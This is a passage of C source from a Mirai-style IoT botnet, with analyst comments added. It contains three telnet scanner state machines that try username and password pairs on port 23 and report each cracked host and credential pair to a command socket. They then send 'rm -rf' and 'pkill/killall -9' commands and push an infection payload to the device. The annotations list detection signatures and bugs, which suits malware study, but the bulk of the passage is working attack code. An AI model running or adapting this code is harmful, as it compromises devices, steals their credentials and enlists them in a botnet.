 *    connections towards the BCMSCAN() prefixes, and control-channel lines
 *    beginning "[ BCM ] " or "REPORT ", are the observable signs of this
 *    routine. Devices are exposed to it only if telnet is reachable and the
 *    admin/admin login is still accepted.
 */
void BCMscanner() {
int maxfds = 312, i, res, j, valopt;
int max = maxfds;
char buf[128], cur_dir;
fd_set fdset;
struct timeval tv;
socklen_t lon;
srand(time(NULL) ^ rand_cmwc());
char line[256];
char* buffer;
struct sockaddr_in dest_addr;
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(23);
memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
buffer = malloc(312 + 1);
memset(buffer, 0, 312 + 1);
struct telstate_t fds[max];
// clears only max * (sizeof(int) + 1) bytes; each element is fully zeroed in the loop below
memset(fds, 0, max * (sizeof(int) + 1));
for(i = 0; i < max; i++) {
memset(&(fds[i]), 0, sizeof(struct telstate_t));
fds[i].complete = 1;
fds[i].sockbuf = buffer; } // one receive buffer shared by every slot
while(1) {
for(i = 0; i < max; i++) {
if(fds[i].tTimeout == 0) {
fds[i].tTimeout = time(NULL); }
switch(fds[i].state) {
// state 0: (re)start a slot. complete == 1 means "take a fresh target".
case 0: {
if(fds[i].complete == 1) {
char *tmp = fds[i].sockbuf;
memset(&(fds[i]), 0, sizeof(struct telstate_t));
fds[i].sockbuf = tmp;
fds[i].ip = BCMSCAN(); }
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(23);
memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
dest_addr.sin_addr.s_addr = fds[i].ip;
fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
if(fds[i].fd == -1) continue;
fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) {
sclose(fds[i].fd);
fds[i].complete = 1; }
else {
fds[i].state = 1;
fds[i].tTimeout = 0;
}
}
break;
// state 1: poll for connect completion (10 ms select), give up after 6 s.
case 1: {
FD_ZERO(&fdset);
FD_SET(fds[i].fd, &fdset);
tv.tv_sec = 0;
tv.tv_usec = 10000;
res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
if(res == 1) {
lon = sizeof(int);
valopt = 0;
getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
if(valopt) {
sclose(fds[i].fd);
fds[i].state = 0;
fds[i].complete = 1;
} else {
// connected: switch the socket back to blocking mode and clear the buffer
fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
fds[i].tTimeout = 0;
fds[i].bufUsed = 0;
memset(fds[i].sockbuf, 0, 312);
fds[i].state = 2;
} continue; }
else if(res == -1) {
sclose(fds[i].fd);
fds[i].state = 0;
fds[i].complete = 1;
continue; }
if(fds[i].tTimeout + 6 < time(NULL)) {
sclose(fds[i].fd);
fds[i].state = 0;
fds[i].complete = 1;
}
}
break;
// state 2: wait for the first prompt (patterns in `phone`).
// On contains_fail() the slot returns to state 0 with complete still 0, so
// the same address is tried again; the descriptor is not closed on this path.
case 2: {
if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 312, phone)) {
if(contains_fail(fds[i].sockbuf)) {
fds[i].state = 0;
} else {
fds[i].state = 3; }
continue; }
if(fds[i].tTimeout + 6 < time(NULL)) {
fds[i].state = 0;
fds[i].complete = 1;
}
}
break;
// state 3: first credential line, hard-coded "admin" (presumably the username).
case 3: {
if(send(fds[i].fd, "admin\r\n", 7, MSG_NOSIGNAL) < 0) {
fds[i].state = 0;
fds[i].complete = 1;
continue; }
fds[i].state = 4;
}
break;
// state 4: wait for the next prompt (patterns in `phone`).
case 4: {
if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 312, phone)) {
if(contains_fail(fds[i].sockbuf)) {
fds[i].state = 0;
} else {
fds[i].state = 5; }
continue; }
if(fds[i].tTimeout + 6 < time(NULL)) {
fds[i].state = 0;
fds[i].complete = 1;
}
}
break;
// state 5: second credential line, hard-coded "admin" (presumably the password).
case 5: {
if(send(fds[i].fd, "admin\r\n", 7, MSG_NOSIGNAL) < 0) {
fds[i].state = 0;
fds[i].complete = 1;
continue; }
fds[i].state = 6; }
break;
// state 6: check the post-login response (patterns in `advances2`) and, if
// it is not a failure, report the host to the control socket.
// usernameInd / passwordInd are never changed in this function after the
// memset in state 0, so the report names entry 0 of each table rather than
// the literal strings sent in states 3 and 5.
case 6: {
if (read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 312, advances2)) {
fds[i].tTimeout = time(NULL);
if (contains_fail(fds[i].sockbuf)) {
fds[i].state = 0;
} else {
sockprintf(mainCommSock, "[ BCM ] Successfully Bruted. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
                                sockprintf(mainCommSock, "REPORT %s:%s:%s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
                                fds[i].state = 7;
} continue; }
if (fds[i].tTimeout + 7 < time(NULL)) {
fds[i].state = 0;
fds[i].complete = 1;
}
}
break;
// state 7: post-login commands sent to the remote shell, in order:
// remove temp directories, kill competing processes, then the download
// payload. Each step is also reported on the control socket.
// Both command strings are built with unbounded sprintf() into 80-byte
// arrays; the lengths of Temp_Directorys / Bot_Killer_Binarys are not
// visible here.
// NOTE(review): tTimeout is refreshed just before the 60 s check, so that
// check looks unable to fire on the same pass and the slot appears to stay
// in state 7, repeating these sends until one fails. Confirm dynamically.
case 7: {
    char RemoveTheTempDirs [80];
                sprintf(RemoveTheTempDirs, "rm -rf %s;", Temp_Directorys);
                if(send(fds[i].fd, RemoveTheTempDirs, strlen(RemoveTheTempDirs), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
                RemoveTempDirs();
                sockprintf(mainCommSock, "[ BCM ] Removing Temp Directorys. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
                char killtheproccesses[80];
                sprintf(killtheproccesses, "pkill -9 %s;killall -9 %s;", Bot_Killer_Binarys, Bot_Killer_Binarys);
                if(send(fds[i].fd, killtheproccesses, strlen(killtheproccesses), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
                sockprintf(mainCommSock, "[ BCM ] Bot Killing. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);

fds[i].tTimeout = time(NULL);
if(send(fds[i].fd, Busybox_Payload, strlen(Busybox_Payload), MSG_NOSIGNAL) < 0) {
sclose(fds[i].fd);
fds[i].state = 0;
fds[i].complete = 1;
continue; }
fds[i].complete = 3;
if(fds[i].tTimeout + 60 < time(NULL)) {
if(fds[i].complete !=3){
}
fds[i].state = 0;
fds[i].complete = 1;
}
break;
}
}
}
}
}
  1689. void TelnetScanner(int wait_usec, int maxfds){
  1690.         int max = getdtablesize() - 100, i, res, num_tmps, j;
  1691.         char buf[128], cur_dir;
  1692.         if (max > maxfds)
  1693.                 max = maxfds;
  1694.         fd_set fdset;
  1695.         struct timeval tv;
  1696.         socklen_t lon;
  1697.         int valopt;
  1698.         char line[256];
  1699.         char* buffer;
  1700.         struct sockaddr_in dest_addr;
  1701.         dest_addr.sin_family = AF_INET;
  1702.         dest_addr.sin_port = htons(23);
  1703.         memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  1704.         buffer = malloc(SOCKBUF_SIZE + 1);
  1705.         memset(buffer, 0, SOCKBUF_SIZE + 1);
  1706.         struct telstate_t fds[max];
  1707.         memset(fds, 0, max * (sizeof(int) + 1));
  1708.         for(i = 0; i < max; i++)
  1709.         {
  1710.             memset(&(fds[i]), 0, sizeof(struct telstate_t));
  1711.             fds[i].complete = 1;
  1712.             fds[i].sockbuf = buffer;
  1713.         }
  1714.         while(1) {
  1715.                 for(i = 0; i < max; i++) {
  1716.                         if(fds[i].tTimeout == 0) {
  1717.                                 fds[i].tTimeout = time(NULL);
  1718.                         }
  1719.                         switch(fds[i].state) {
  1720.             case 0:
  1721.                 {
  1722.                     if(fds[i].complete == 1)
  1723.                     {
  1724.                         char *tmp = fds[i].sockbuf;
  1725.                         memset(&(fds[i]), 0, sizeof(struct telstate_t));
  1726.                         fds[i].sockbuf = tmp;
  1727.                         fds[i].ip = findARandomIP();
  1728.                     }
  1729.                     else if(fds[i].complete == 0)
  1730.                     {
  1731.                         fds[i].usernameInd++;
  1732.                         fds[i].passwordInd++;
  1733.                         if(fds[i].passwordInd == sizeof(Telnet_Passwords) / sizeof(char *))
  1734.                         {
  1735.                             fds[i].complete = 1;
  1736.                             continue;
  1737.                         }
  1738.                         if(fds[i].usernameInd == sizeof(Telnet_Usernames) / sizeof(char *))
  1739.                         {
  1740.                             fds[i].complete = 1;
  1741.                             continue;
  1742.                         }
  1743.                     }
  1744.                     dest_addr.sin_family = AF_INET;
  1745.                     dest_addr.sin_port = htons(23);
  1746.                     memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  1747.                     dest_addr.sin_addr.s_addr = fds[i].ip;
  1748.                     fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
  1749.                     if(fds[i].fd == -1) continue;
  1750.                     fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
  1751.                     if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS)
  1752.                     {
  1753.                         reset_telstate(&fds[i]);
  1754.                     }
  1755.                     else
  1756.                     {
  1757.                         advance_telstate(&fds[i], 1);
  1758.                     }
  1759.                 }
  1760.                 break;
  1761.             case 1:
  1762.                 {
  1763.                     FD_ZERO(&fdset);
  1764.                     FD_SET(fds[i].fd, &fdset);
  1765.                     tv.tv_sec = 0;
  1766.                     tv.tv_usec = wait_usec;
  1767.                     res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
  1768.                     if(res == 1) {
  1769.                         fds[i].tTimeout = 0;
  1770.                         lon = sizeof(int);
  1771.                         valopt = 0;
  1772.                         getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
  1773.                         if(valopt)
  1774.                         {
  1775.                             reset_telstate(&fds[i]);
  1776.                         }
  1777.                         else
  1778.                         {
  1779.                             fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
  1780.                             advance_telstate(&fds[i], 2);
  1781.                         }
  1782.                         continue;
  1783.                     }
  1784.                     else if(res == -1)
  1785.                     {
  1786.                         reset_telstate(&fds[i]);
  1787.                         continue;
  1788.                     }
  1789.                     if(fds[i].tTimeout + 7 < time(NULL))
  1790.                     {
  1791.                         reset_telstate(&fds[i]);
  1792.                     }
  1793.                 }
  1794.                 break;
  1795.             case 2:
  1796.                 {
  1797.                     if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
  1798.                     {
  1799.                         fds[i].tTimeout = time(NULL);
  1800.                         if(contains_fail(fds[i].sockbuf))
  1801.                         {
  1802.                             advance_telstate(&fds[i], 0);
  1803.                         }
  1804.                         else
  1805.                         {
  1806.                             advance_telstate(&fds[i], 3);
  1807.                         }
  1808.                         continue;
  1809.                     }
  1810.                     if(fds[i].tTimeout + 7 < time(NULL))
  1811.                     {
  1812.                         reset_telstate(&fds[i]);
  1813.                     }
  1814.                 }
  1815.                 break;
  1816.             case 3:
  1817.                 {
  1818.                     if(send(fds[i].fd, Telnet_Usernames[fds[i].usernameInd], strlen(Telnet_Usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0)
  1819.                     {
  1820.                         reset_telstate(&fds[i]);
  1821.                         continue;
  1822.                     }
  1823.                     if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
  1824.                     {
  1825.                         reset_telstate(&fds[i]);
  1826.                         continue;
  1827.                     }
  1828.                     advance_telstate(&fds[i], 4);
  1829.                 }
  1830.                 break;
  1831.             case 4:
  1832.                 {
  1833.                     if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
  1834.                     {
  1835.                         fds[i].tTimeout = time(NULL);
  1836.                         if(contains_fail(fds[i].sockbuf))
  1837.                         {
  1838.                             advance_telstate(&fds[i], 0);
  1839.                         }
  1840.                         else
  1841.                         {
  1842.                             advance_telstate(&fds[i], 5);
  1843.                         }
  1844.                         continue;
  1845.                     }
  1846.                     if(fds[i].tTimeout + 7 < time(NULL))
  1847.                     {
  1848.                         reset_telstate(&fds[i]);
  1849.                     }
  1850.                 }
  1851.                 break;                             
  1852.             case 5:
  1853.                 {
  1854.                     if(send(fds[i].fd, Telnet_Passwords[fds[i].passwordInd], strlen(Telnet_Passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0)
  1855.                     {
  1856.                         reset_telstate(&fds[i]);
  1857.                         continue;
  1858.                     }
  1859.                     if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
  1860.                     {
  1861.                         reset_telstate(&fds[i]);
  1862.                         continue;
  1863.                     }
  1864.                     advance_telstate(&fds[i], 6);
  1865.                 }
  1866.                 break;                                 
  1867.             case 6:
  1868.                 {
  1869.                     if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances2))
  1870.                     {
  1871.                         fds[i].tTimeout = time(NULL);
  1872.                         if(contains_fail(fds[i].sockbuf))
  1873.                         {
  1874.                             advance_telstate(&fds[i], 0);
  1875.                         }
  1876.                         else if(contains_success(fds[i].sockbuf))
  1877.                         {
  1878.                             if(fds[i].complete == 2)
  1879.                             {
  1880.                                 advance_telstate(&fds[i], 7);
  1881.                             }
  1882.                             else
  1883.                             {
  1884.                                 sockprintf(mainCommSock, "[ TELNET ] Successfully Bruted. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  1885.                                 sockprintf(mainCommSock, "REPORT %s:%s:%s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  1886.                                 advance_telstate(&fds[i], 7);
  1887.                             }
  1888.                         }
  1889.                         else
  1890.                         {
  1891.                             reset_telstate(&fds[i]);
  1892.                         }
  1893.                         continue;
  1894.                     }
  1895.                     if(fds[i].tTimeout + 7 < time(NULL))
  1896.                     {
  1897.                         reset_telstate(&fds[i]);
  1898.                     }
  1899.                 }
  1900.                 break;
  1901.             case 7:
  1902.             {
  1903.                 char RemoveTheTempDirs [80];
  1904.                 sprintf(RemoveTheTempDirs, "rm -rf %s;", Temp_Directorys);
  1905.                 if(send(fds[i].fd, RemoveTheTempDirs, strlen(RemoveTheTempDirs), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
  1906.                 RemoveTempDirs();
  1907.                 sockprintf(mainCommSock, "[ TELNET ] Removing Temp Directorys. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  1908.                 char killtheproccesses[80];
  1909.                 sprintf(killtheproccesses, "pkill -9 %s;killall -9 %s;", Bot_Killer_Binarys, Bot_Killer_Binarys);
  1910.                 if(send(fds[i].fd, killtheproccesses, strlen(killtheproccesses), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
  1911.                 sockprintf(mainCommSock, "[ TELNET ] Bot Killing. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  1912.                 advance_telstate(&fds[i], 8);
  1913.             }
  1914.             break;
  1915.             case 8:
  1916.                 {
  1917.                         fds[i].tTimeout = time(NULL);
  1918.                         if(send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) < 0);
  1919.                         if(send(fds[i].fd, "shell\r\n", 7, MSG_NOSIGNAL) < 0);
  1920.                         if(send(fds[i].fd, Busybox_Payload, strlen(Busybox_Payload), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
  1921.                         sockprintf(mainCommSock, "[ TELNET ] Sending Infection Payload. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  1922.                         if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, "CONNECTED"))
  1923.                         {
  1924.                             if(strcasestr(fds[i].sockbuf, "CONNECTED") && fds[i].complete != 3)
  1925.                             {
  1926.                                 sockprintf(mainCommSock, "[ TELNET ] Infection Success. || IP: %s: || Port: 23 || Username: %s || Password: %s", inet_ntoa(*(struct in_addr *)&(fds[i].ip)), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  1927.                                 fds[i].complete = 3;
  1928.                             }
  1929.                         }
  1930.                         if(fds[i].tTimeout + 10 < time(NULL))
  1931.                         {
  1932.                             if(fds[i].complete!=3)
  1933.                             {
  1934.                                 sockprintf(mainCommSock, "[ TELNET ] Infection Failed. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  1935.                             }
  1936.                             reset_telstate(&fds[i]);
  1937.                         }
  1938.                         break;
  1939.                 }
  1940.             }
  1941.         }
  1942.     }              
  1943. }
  1944. void MiraiScanner(int wait_usec, int maxfds){
                // Analyst annotation (code unchanged). MiraiScanner is a never-returning loop
                // that drives up to `max` concurrent telnet (TCP/23) sessions, one per slot in
                // fds[], through a state machine kept in fds[i].state:
                //   0      choose an address or the next credential pair, start a non-blocking connect
                //   1      wait for the connect to complete
                //   2/4/6  read the peer's reply
                //   3/5    send the username / the password
                //   7      send cleanup and process-kill command strings
                //   8      send Busybox_Payload and look for CONNECTED in the reply
                // wait_usec: timeout handed to select() and read_until_response().
                // maxfds:    upper bound on the number of slots.
                // MiraiIPRanges, advance_telstate, reset_telstate, read_until_response,
                // contains_fail, contains_success, sockprintf, get_telstate_host, RemoveTempDirs
                // and the tables/strings (Mirai_*, Telnet_*, advances, advances2, Temp_Directorys,
                // Bot_Killer_Binarys, Busybox_Payload, mainCommSock) are defined outside this
                // excerpt; what is said about them below is limited to how they are used here.
                // Detection: the fixed status lines written to mainCommSock ("[ MIRAI ] ..." and
                // "REPORT <ip>:<user>:<pass>") and the post-login command strings are stable
                // content signatures; on the wire the routine appears as one host opening many
                // outbound TCP/23 connections. Removing telnet exposure, or credentials that
                // appear in the tables, stops the login stage.
  1945.         int max = getdtablesize() - 100, i, res, num_tmps, j;
  1946.         char buf[128], cur_dir;
                // Slot count: descriptor-table size minus 100, capped at maxfds.
                // num_tmps, j, buf, cur_dir and line are declared but not used in this function.
  1947.         if (max > maxfds)
  1948.                 max = maxfds;
  1949.         fd_set fdset;
  1950.         struct timeval tv;
  1951.         socklen_t lon;
  1952.         int valopt;
  1953.         char line[256];
  1954.         char* buffer;
  1955.         struct sockaddr_in dest_addr;
  1956.         dest_addr.sin_family = AF_INET;
  1957.         dest_addr.sin_port = htons(23);
  1958.         memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
                // One receive buffer is allocated here and the same pointer is stored in every slot below.
  1959.         buffer = malloc(SOCKBUF_SIZE + 1);
  1960.         memset(buffer, 0, SOCKBUF_SIZE + 1);
  1961.         struct telstate_t fds[max];
                // This memset covers max * (sizeof(int) + 1) bytes; each entry is zeroed in full by the loop that follows.
  1962.         memset(fds, 0, max * (sizeof(int) + 1));
  1963.         for(i = 0; i < max; i++) {
  1964.                 memset(&(fds[i]), 0, sizeof(struct telstate_t));
                        // complete == 1 makes state 0 pick a fresh address for the slot.
  1965.                 fds[i].complete = 1;
  1966.                 fds[i].sockbuf = buffer;
  1967.         }
  1968.         while(1) {
  1969.                 for(i = 0; i < max; i++) {
                                // tTimeout == 0 means "stage timer not started"; start it now.
  1970.                         if(fds[i].tTimeout == 0) {
  1971.                                 fds[i].tTimeout = time(NULL);
  1972.                         }
                                // Inside the switch, `continue` moves on to the next slot of the for loop.
  1973.                         switch(fds[i].state) {
                    // State 0: new address (complete == 1) or next credential pair (complete == 0), then connect.
  1974.             case 0:
  1975.                 {
  1976.                     if(fds[i].complete == 1)
  1977.                     {
                                // Wipe the slot but keep its buffer pointer; the connect address comes from MiraiIPRanges().
  1978.                         char *tmp = fds[i].sockbuf;
  1979.                         memset(&(fds[i]), 0, sizeof(struct telstate_t));
  1980.                         fds[i].sockbuf = tmp;
  1981.                         fds[i].ip = MiraiIPRanges();
  1982.                     }
  1983.                     else if(fds[i].complete == 0)
  1984.                     {
                                // Both indices advance together, so credentials are tried as (user[k], pass[k]) pairs.
  1985.                         fds[i].usernameInd++;
  1986.                         fds[i].passwordInd++;
  1987.                         if(fds[i].passwordInd == sizeof(Mirai_Passwords) / sizeof(char *))
  1988.                         {
  1989.                             fds[i].complete = 1;
  1990.                         }
  1991.                         if(fds[i].usernameInd == sizeof(Mirai_Usernames) / sizeof(char *))
  1992.                         {
  1993.                             fds[i].complete = 1;
  1994.                             continue;
  1995.                         }
  1996.                     }
  1997.                     dest_addr.sin_family = AF_INET;
  1998.                     dest_addr.sin_port = htons(23);
  1999.                     memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  2000.                     dest_addr.sin_addr.s_addr = fds[i].ip;
  2001.                     fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
  2002.                     if(fds[i].fd == -1) continue;
                            // Non-blocking connect: EINPROGRESS is the expected result and is completed in state 1.
  2003.                     fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
  2004.                     if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS)
  2005.                     {
                                // reset_telstate is defined elsewhere; presumably it closes the socket and recycles the slot (confirm).
  2006.                         reset_telstate(&fds[i]);
  2007.                     }
  2008.                     else
  2009.                     {
  2010.                         advance_telstate(&fds[i], 1);
  2011.                     }
  2012.                 }
  2013.                 break;
                    // State 1: poll the socket for writability, then read SO_ERROR to learn whether the connect succeeded.
  2014.             case 1:
  2015.                 {
  2016.                     FD_ZERO(&fdset);
  2017.                     FD_SET(fds[i].fd, &fdset);
  2018.                     tv.tv_sec = 0;
  2019.                     tv.tv_usec = wait_usec;
  2020.                     res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
  2021.                     if(res == 1)
  2022.                     {
  2023.                         fds[i].tTimeout = time(NULL);
  2024.                         lon = sizeof(int);
  2025.                         valopt = 0;
  2026.                         getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
  2027.                         if(valopt)
  2028.                         {
  2029.                             reset_telstate(&fds[i]);
  2030.                         }
  2031.                         else
  2032.                         {
                                    // Connected: switch the socket back to blocking mode for the login dialogue.
  2033.                             fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
  2034.                             advance_telstate(&fds[i], 2);
  2035.                         }
  2036.                         continue;
  2037.                     }
  2038.                     else if(res == -1)
  2039.                     {
  2040.                         reset_telstate(&fds[i]);
  2041.                         continue;
  2042.                     }
                            // Give up on the connect once more than 7 seconds have passed since the stage timer started.
  2043.                     if(fds[i].tTimeout + 7 < time(NULL))
  2044.                     {
  2045.                         reset_telstate(&fds[i]);
  2046.                     }
  2047.                 }
  2048.                 break;
                    // State 2: wait for the first reply, using the `advances` table; a "fail" match returns to state 0.
  2049.             case 2:
  2050.                 {
  2051.                     if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
  2052.                     {
  2053.                         fds[i].tTimeout = time(NULL);
  2054.                         if(contains_fail(fds[i].sockbuf))
  2055.                         {
  2056.                             advance_telstate(&fds[i], 0);
  2057.                         }
  2058.                         else
  2059.                         {
  2060.                             advance_telstate(&fds[i], 3);
  2061.                         }
  2062.                         continue;
  2063.                     }
  2064.                     if(fds[i].tTimeout + 7 < time(NULL))
  2065.                     {
  2066.                         reset_telstate(&fds[i]);
  2067.                     }
  2068.                 }
  2069.                 break;
                    // State 3: send the current username followed by CRLF.
  2070.             case 3:
  2071.                 {
  2072.                     if(send(fds[i].fd, Mirai_Usernames[fds[i].usernameInd], strlen(Mirai_Usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0)
  2073.                     {
  2074.                         reset_telstate(&fds[i]);
  2075.                         continue;
  2076.                     }
  2077.                     if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
  2078.                     {
  2079.                         reset_telstate(&fds[i]);
  2080.                         continue;
  2081.                     }
  2082.                     advance_telstate(&fds[i], 4);
  2083.                 }
  2084.                 break;
                    // State 4: wait for the reply to the username.
  2085.             case 4:
  2086.                 {
  2087.                     if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
  2088.                     {
  2089.                         fds[i].tTimeout = time(NULL);
  2090.                         if(contains_fail(fds[i].sockbuf))
  2091.                         {
  2092.                             advance_telstate(&fds[i], 0);
  2093.                         }
  2094.                         else
  2095.                         {
  2096.                             advance_telstate(&fds[i], 5);
  2097.                         }
  2098.                         continue;
  2099.                     }
  2100.                     if(fds[i].tTimeout + 7 < time(NULL))
  2101.                     {
  2102.                         reset_telstate(&fds[i]);
  2103.                     }
  2104.                 }
  2105.                 break;                             
                    // State 5: send the current password followed by CRLF.
  2106.             case 5:
  2107.                 {
  2108.                     if(send(fds[i].fd, Mirai_Passwords[fds[i].passwordInd], strlen(Mirai_Passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0)
  2109.                     {
  2110.                         reset_telstate(&fds[i]);
  2111.                         continue;
  2112.                     }
  2113.                     if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
  2114.                     {
  2115.                         reset_telstate(&fds[i]);
  2116.                         continue;
  2117.                     }
  2118.                     advance_telstate(&fds[i], 6);
  2119.                 }
  2120.                 break;                                 
                    // State 6: classify the reply to the password (table `advances2`): fail -> state 0,
                    // success -> report to mainCommSock and go to state 7, anything else -> reset.
  2121.             case 6:
  2122.                 {
  2123.                     if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances2)) //waiting for response.
  2124.                     {
  2125.                         fds[i].tTimeout = time(NULL);
  2126.                         if(contains_fail(fds[i].sockbuf))
  2127.                         {
  2128.                             advance_telstate(&fds[i], 0);
  2129.                         }
  2130.                         else if(contains_success(fds[i].sockbuf))
  2131.                         {
  2132.                             if(fds[i].complete == 2)
  2133.                             {
  2134.                                 advance_telstate(&fds[i], 7);
  2135.                             }
  2136.                             else
  2137.                             {
                                        // Two lines go to mainCommSock: a human-readable status and a machine-readable
                                        // "REPORT host:user:pass". The REPORT fields are read from the Telnet_* tables
                                        // at the same indices, while the status line reads the Mirai_* tables.
  2138.                                 sockprintf(mainCommSock, "[ MIRAI ] Successfully Bruted. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Mirai_Usernames[fds[i].usernameInd], Mirai_Passwords[fds[i].passwordInd]);
  2139.                                 sockprintf(mainCommSock, "REPORT %s:%s:%s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  2140.                                 advance_telstate(&fds[i], 7);
  2141.                             }
  2142.                         }
  2143.                         else
  2144.                         {
  2145.                             reset_telstate(&fds[i]);
  2146.                         }
  2147.                         continue;
  2148.                     }
  2149.                     if(fds[i].tTimeout + 7 < time(NULL))
  2150.                     {
  2151.                         reset_telstate(&fds[i]);
  2152.                     }
  2153.                 }
  2154.                 break;
                    // State 7: two command strings are formatted into 80-byte stack buffers and sent to the
                    // logged-in peer: "rm -rf <Temp_Directorys>;" and "pkill -9 <X>;killall -9 <X>;" with
                    // X = Bot_Killer_Binarys. RemoveTempDirs() is also called in this process. Each step is
                    // reported to mainCommSock. These command strings appear verbatim in the telnet stream.
  2155.             case 7:
  2156.                 {
  2157.                 char RemoveTheTempDirs [80];
  2158.                 sprintf(RemoveTheTempDirs, "rm -rf %s;", Temp_Directorys);
  2159.                 if(send(fds[i].fd, RemoveTheTempDirs, strlen(RemoveTheTempDirs), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
  2160.                 RemoveTempDirs();
  2161.                 sockprintf(mainCommSock, "[ MIRAI ] Removing Temp Directorys. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  2162.                 char killtheproccesses[80];
  2163.                 sprintf(killtheproccesses, "pkill -9 %s;killall -9 %s;", Bot_Killer_Binarys, Bot_Killer_Binarys);
  2164.                 if(send(fds[i].fd, killtheproccesses, strlen(killtheproccesses), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
